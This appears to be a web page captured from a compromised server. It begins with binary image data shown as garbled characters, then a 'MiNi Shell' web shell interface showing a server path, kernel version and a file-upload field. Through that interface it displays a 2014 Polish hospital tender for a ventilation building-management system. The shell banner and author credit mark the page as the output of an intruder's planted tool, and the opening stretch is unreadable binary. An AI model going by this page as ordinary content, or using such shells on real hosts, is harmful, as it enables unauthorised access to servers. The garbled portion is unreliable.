JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140616/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140616/129517-N-2014.html

<p class="kh_header"><b>Warszawa: kompleksową informatyzację Międzyleskiego Szpitala Specjalistycznego w Warszawie sposobem na przeciwdziałanie wykluczeniu informatycznemu WSPÓŁFINANSOWANEGO Z EUROPEJSKIEGO FUNDUSZU ROZWOJU REGIONALNEGI W RAMACH PRIORYTETU II Przyspieszenie e-rozwoju Mazowsza DZIAŁANIA 2.1 Przeciwdziałanie wykluczeniu informatycznemu REGIONALNEGO PROGRAMU OPERACYJNEGO WOJEWÓDZTWA MAZOWIECKIEGO 2007-2013 - wentylacja</b><br>
<b>Numer ogłoszenia: 129517 - 2014; data zamieszczenia: 16.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Międzyleski Szpital Specjalistyczny w Warszawie , ul. Bursztynowa 2, 04-749 Warszawa, woj. mazowieckie, tel. 022 4735145, faks 022 6131992.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mssw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> kompleksową informatyzację Międzyleskiego Szpitala Specjalistycznego w Warszawie sposobem na przeciwdziałanie wykluczeniu informatycznemu WSPÓŁFINANSOWANEGO Z EUROPEJSKIEGO FUNDUSZU ROZWOJU REGIONALNEGI W RAMACH PRIORYTETU II Przyspieszenie e-rozwoju Mazowsza DZIAŁANIA 2.1 Przeciwdziałanie wykluczeniu informatycznemu REGIONALNEGO PROGRAMU OPERACYJNEGO WOJEWÓDZTWA MAZOWIECKIEGO 2007-2013 - wentylacja.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wentylacja - dostawa i montaż urządzeń centralnej sterowni systemów wentylacyjnych A.	
ROZMIARY I CHARAKTER ZADANIA
1. Celem zadania budowa centralnego systemu sterowania i przyłączenie do niego 22 central wentylacyjnych eksploatowanych przez Szpital.
2. Wspólny system zarządzania musi być kontrolowany za pomocą oprogramowania klasy BMS (Building Management System), które będzie komunikowało się ze sterownikami central wentylacyjnych w celu:
a) odczytu parametrów pracy;
b) sterowania urządzeniami (w zakresie funkcjonalności udostępnianych przez zainstalowany sterownik centrali).
3. W związku z budową centralnej systemu zarządzania należy zrealizować dostawy i wykonać czynności:
a) analiza przedwdrożeniowa stanu eksploatowanych central wentylacyjnych pod kątem możliwości wykorzystania jego elementów, a w szczególności sterowników, okablowania oraz elementów montażowych;
b) rozbudowa central wentylacyjnych obejmująca czynności konieczne do przyłączenia do systemu zarządzania
- wykonanie tras kablowych oraz rur ochronnych dla instalacji teletechnicznych;
- zainstalowanie okablowania teletechnicznego;
- dostawa kart komunikacyjnych do eksploatowanych sterowników automatyki klimatyzacji i wentylacji;
- dostawa konwerterów komunikacyjnych;
- wymiana sterowników central (w przypadku braku możliwości przyłączenia do systemu zarządzania zastanych w centrali sterowników);
- modernizacja szaf sterujących w zakresie niezbędnym do realizacji zadania;
- przyłączenie systemu zarządzania centralami sterującymi do sieci lokalnej (LAN, Local Area Network) Szpitala.
c) dostarczenie i zainstalowanie komputera, który pełnić będzie funkcję stacji nadzoru;
d) dostarczenie oprogramowania stacji nadzoru, jego zainstalowanie i skonfigurowanie do pracy z instalacją;
e) przeszkolenie 3 pracowników Szpitala w zakresie bieżącej eksploatacji oraz konserwacji centralnej sterowni systemów wentylacyjnych.
4. Wszystkie urządzenia oraz materiały użyte do realizacji zamówienia:
a) muszą być fabrycznie nowe, wyprodukowane nie wcześniej niż 12 miesięcy przed datą ich zamontowania, oryginalne i sprawne technicznie;
b) muszą odpowiadać co do jakości wymogom wyrobów dopuszczonych do obrotu i stosowania na terenie Polski i posiadać niezbędne aprobaty techniczne, atesty, certyfikaty i świadectwa.
5. Wykonawca będzie prowadził prace zgodnie z aktualnymi normami i przepisami, zasadami wiedzy technicznej oraz z należytą starannością, przy zachowaniu bezpieczeństwa (w tym pożarowego) i przepisów dotyczących pracy urządzeń elektrycznych.
6. Roboty mogą być prowadzone całodobowo, również w dni ustawowo wolne od pracy. Należy przy tym uwzględnić charakteru obiektu i obowiązującą w nim ciszę nocną.
7. Pomieszczenia będą udostępniane po uzgodnieniu z uprawnionym personelem Szpitala terminu prac w konkretnych lokalizacjach.
8. W związku z prowadzeniem prac o charakterze budowlanymi Wykonawca jest zobowiązany do:
a) uzgodnienia zakresu niezbędnych robót budowlanych (np. przekucia ścian, stropów), z uprawnionymi pracownikami Szpitala przed przystąpieniem do ich realizacji;
b) używania wyłącznie urządzeń wiertniczych udarowo-obrotowych do wykonywania przepustów kablowych poprzez ściany i stropy (zabrania się prowadzenia takich prac za pomocą przecinaków ręcznych);
c) uprzątnięcia pomieszczeń i terenu posesji w miejscach, w których wykonywane były prace montażowe, bezpośrednio po ich zakończeniu;
d) naprawienia na swój koszt uszkodzonych w trakcie prac instalatorskich tynków, posadzek i powłok malarskich;
e) utylizacji we własnym zakresie wszelkich zdemontowanych elementów wyposażenia.
9. Szpital zapewni we własnym zakresie:
a) dostęp do sieci LAN (Local Area Network) Szpitala w każdym z punktów rejestracji czasu pracy, za pośrednictwem portów dostępowych 10/100Base-T (RJ45):
- jeden port dostępowy dla sterownika czytnika (czytników) kart zbliżeniowych,
- jeden port dostępowy w miejscu przeznaczonym do montażu kamery monitoringu wizyjnego.
10. Wykonawca zapewni:
a) 36-miesięczny okres rękojmi na wykonane prace instalacyjno montażowe - od daty zakończenia tych prac;
b) 24-miesięczny okres gwarancji na wszystkie dostarczone komponenty - od daty ich zamontowania i/lub uruchomienia przez Wykonawcę.
11. Szpital będzie potwierdzał odbiory:
a) wyposażenia stałego - wyłącznie po jego trwałym zamontowaniu przez Wykonawcę w miejscu eksploatacji;
b) wyposażenia ruchomego - wyłącznie po zademonstrowaniu przez Wykonawcę jego pełnej użyteczności w ramach budowanego systemu;
c) oprogramowania - wyłącznie po zademonstrowaniu przez Wykonawcę jego pełnej użyteczności w ramach opisanych wymagań i przeprowadzeniu szkolenia.
12. Zakończenie prac musi nastąpić do końca 3 miesiąca od daty podpisania umowy między Szpitalem a Wykonawcą.
B. LISTA CENTRAL 
1. Budynek A:
1.szafa centrali KN1 (sterownik CAREL pCO2 - 2szt.);
2. szafa centrali KN2 (sterownik CAREL pCO2 - 2szt.);
3. szafa centrali KN3 (sterownik CAREL pCO2 - 2szt.).
2. Budynek C:
1. szafa centrali sale operacyjne (sterownik Johnson Controls FX15 - 1szt.);
2. szafa centrali sale wybudzeń  (sterownik Johnson Controls FX06 - 1szt.);
3. szafa centrali oddział ortopedii (sterownik Johnson Controls FX06 - 1szt.).
3. Budynek D:
1. szafa centrali KN7 (brak sterownika);
2. szafa centrali otolaryngologia (sterownik Simens RLU 232 - 1szt.);
3. szafa centrali rezonans (Honeywell XL80/100 - 1 kpl.);
4. szafa centrali kardiologia (Siemens ACX36.040 - 1 kpl.);
5. szafa centrali N3 (Siemans Polygyr RWX.62.70.34 - 1 kpl.);
6. szafa wentylatorni II wewnętrzny (Johnson Controls SC-9100 - 1 kpl.).
4. Budynek E:
1. szafa centrali KN1 (sterownik Johnson Controls FX06 - 1szt.);
2. szafa centrali KN2 (sterownik Johnson Controls FX06 - 1szt.);
3. szafa centrali N3/W3 (sterownik Johnson ControlsFX06 - 1szt.);
4. szafa centrali N4/W4 (sterownik Johnson Controls FX06 - 1szt.);
5. szafa centrali N5 (sterownik Johnson Controls FX06 - 1szt.);
6. szafa centrali N6 (sterownik Johnson Controls FX06 - 1szt.);
7. szafa centrali N7 (sterownik Johnson Controls FX06 - 1szt.);
8. szafa centrali N8/W8 (sterownik Johnson Controls FX06 - 1szt.).
5. Budynek F:
1. szafa SA1 w pomieszczeniu F/021 (sterownik CAREL pCO3 - 2szt.);
2. szafa SA2 w pomieszczeniu F/023 (sterownik CAREL pCO3 - 1szt.).
C. STACJA NADZORU
Komputer klasy PC o parametrach:
1. Procesor min. 2-rdzeniowy.
2. Dysk twardy SATA min. 500GB.
3. Minimum 4GB pamięci RAM.
4. Monitor LCD:
a) matryca o przekątnej min. 24;
b) wyświetlający obraz o rozdzielczości min. 1280x1024.
5. Zasilacz w technologii Active Power Factor Correction (dopuszczalne napięcie zasilania w zakresie od 210 do 250V).
6. Klawiatura.
7. Mysz optyczna.
8. Karta sieciowa z portem Ethernet 10/100/1000Base-T (RJ45).
9. Zainstalowany system operacyjny Microsoft Windows 7 Professional.
D. OPROGRAMOWANIE ZARZĄDZAJĄCE
1. Oprogramowanie ma pracować w środowisku Microsoft Windows.
2. Interfejs oprogramowania ma zapewniać dostęp do monitorowanych parametrów technologicznych, za pomocą hierarchicznych powiązań grafik i symboli.
3. Funkcje oprogramowania w zakresie monitoringu mają umożliwiać co najmniej:
3.2 pomiar temperatur, wilgotności;
3.3 wizualizację stanów pracy/awarii wentylatorów;
3.4 wizualizację stanów awaryjnych instalacji.
4. Oprogramowanie do monitoringu ma umożliwiać generowanie predefiniowanych raportów oraz umożliwić użytkownikom definiowanie własnych formatów raportów.
5.	Oprogramowanie ma gromadzić dane w celu generowania raportów historycznych oraz wyznaczania trendów.
6.	Oprogramowanie ma informować operatora o wszystkich stanach i alarmach zgłaszanych przez sterowniki.
7.	Dostęp do systemu ma być zabezpieczony systemem identyfikatorów i haseł dostępu.
8.	Funkcje w zakresie sterowania mają obejmować co najmniej:
8.2	nastawę parametrów pracy instalacji (temperatura/wilgotność/ciśnienie);
8.3	zmiana/załączenie/wyłączenie wydajności instalacji;
8.4	zlecanie zmian parametrów zgodnie z programem czasowym.
9.	Oprogramowanie musi umożliwiać ograniczanie uprawnień użytkowników w zakresie wykonywania operacji i wykonywania poleceń w systemie.
10.	System ma umożliwiać jednoczesną, zdalną jego obsługę za pośrednictwem sieci Internet z możliwością rozbudowy o obsługę nowych central wentylacyjnych.
11. Cały dostarczony sprzęt musi odpowiadać co do jakości wymogom wyrobów dopuszczonych do obrotu i stosowania na terenie Polski i posiadać niezbędne aprobaty techniczne, atesty, certyfikaty i świadectwa.

III. Terminy realizacji zamówienia: 20.10.2014r. od dnia podpisania umowy

IV. Projekty umów stanowiące Załączniki Nr 1 do SIWZ jest integralną częścią niniejszej dokumentacji i zapisy w niej zawarte traktuje się jako warunki udzielenia zamówienia (projekt umowy na dostawę sprzętu oraz projekt umowy na dostawę i montaż oprogramowania).
V. Podwykonawstwo 
1. Wykonawca może powierzyć wykonanie części zamówienia podwykonawcom.
2. Wykonawca jest obowiązany wskazać w ofercie części zamówienia, których wykonanie zamierza powierzyć podwykonawcom. 
3. Zamawiający  informuje, że nie zastrzega osobistego wykonania przez wykonawcę kluczowych części zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 48.92.10.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.  Posiadają wiedzę i doświadczenie:
Zamawiający uzna, iż Wykonawca posiada niezbędną wiedzę i doświadczenie, jeżeli Wykonawca wykaże, że wykonał należycie nie mniej niż 1 główną dostawę odpowiadającą swoim rodzajem i wartością przedmiotowi zamówienia. Za odpowiedni rodzaj dostawy Zamawiający uzna dostawę, instalację systemów wentylacyjnych za odpowiednią wartość zamawiający uzna minimum 100.000,00 zł brutto.
Zamawiający będzie oceniał:
- minimum 1 główna dostawa odpowiadająca wymaganiom określonym wyżej przez Zamawiającego - spełnia  
-brak minimum 1 głównej dostawy odpowiadających wymaganiom określonym wyżej przez Zamawiającego - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>a) poświadczenie, z tym że w odniesieniu do nadal wykonywanych dostaw lub usług okresowych lub ciągłych poświadczenie nie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert lub;
b) oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w ppkt a)
6b) W razie konieczności, szczególnie gdy wykaz lub dowody, o których mowa w pkt 6 oraz pkt 
6 ppkt a i b) budzą wątpliwości zamawiającego lub gdy z poświadczenia albo z innego dokumentu wynika, że zamówienie nie zostało wykonane lub zostało wykonane nienależycie, zamawiający może zwrócić się bezpośrednio do właściwego podmiotu, na rzecz którego dostawy były lub miały zostać wykonane, o przedłożenie dodatkowych informacji lub dokumentów bezpośrednio zamawiającemu.
6c) W przypadku gdy zamawiający jest podmiotem, na rzecz którego dostawy wskazane w 
   wykazie, o którym mowa w pkt 6, zostały wcześniej wykonane, wykonawca nie ma 
   obowiązku przedkładania dowodów, o których mowa;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony  Formularz Ofertowy stanowiący Załącznik Nr 2 do niniejszej specyfikacji wraz  z wypełnionymi załącznikami - Formularze Cenowe.
2.	Oświadczenie Wykonawcy, że spełnia warunki określone przepisami art. 22 ust. 1 ustawy z dnia 29.01.2004 r. Prawo zamówień publicznych, zgodne ze  wzorem stanowiącym Załącznik  Nr 3 do siwz.
3. Wstępny harmonogram realizacji przedmiotu zamówienia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mssw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Międzyleski Szpital Specjalistyczny w Warszawie 
Dział Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.06.2014 godzina 12:00, miejsce: Kancelaria Międzyleskiego Szpitala Specjalistycznego w Warszawie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> kompleksowa informatyzacja Międzyleskiego Szpitala Specjalistycznego w Warszawie sposobem na przeciwdziałanie wykluczeniu informatycznemu WSPÓŁFINANSOWANEGO Z EUROPEJSKIEGO FUNDUSZU ROZWOJU REGIONALNEGI W RAMACH PRIORYTETU II Przyspieszenie e-rozwoju Mazowsza DZIAŁANIA 2.1 Przeciwdziałanie wykluczeniu informatycznemu REGIONALNEGO PROGRAMU OPERACYJNEGO WOJEWÓDZTWA MAZOWIECKIEGO 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com